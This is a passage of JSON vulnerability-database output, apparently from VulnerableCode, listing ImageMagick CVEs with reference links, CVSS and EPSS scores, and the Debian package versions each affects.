"reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1726084", "reference_id": "1726084", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1726084" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931342", "reference_id": "931342", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931342" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13137" ], "risk_score": 1.8, "exploitability": "0.5", "weighted_severity": "3.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kfb4-xnqr-cya6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81975?format=api", "vulnerability_id": "VCID-mhbe-8x14-f3d6", "summary": "ImageMagick: division by zero at MagickCore/gem-private.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27773.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27773.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27773", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26134", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26215", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26256", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26027", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26093", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26146", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26155", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26109", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.2605", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26053", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.26032", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25998", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00093", "scoring_system": "epss", "scoring_elements": "0.25938", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27773" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27773", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27773" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898295", "reference_id": "1898295", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898295" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27773" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mhbe-8x14-f3d6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49503?format=api", "vulnerability_id": "VCID-mmw7-4m3z-2kcn", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-44268.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-44268.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-44268", "reference_id": "", 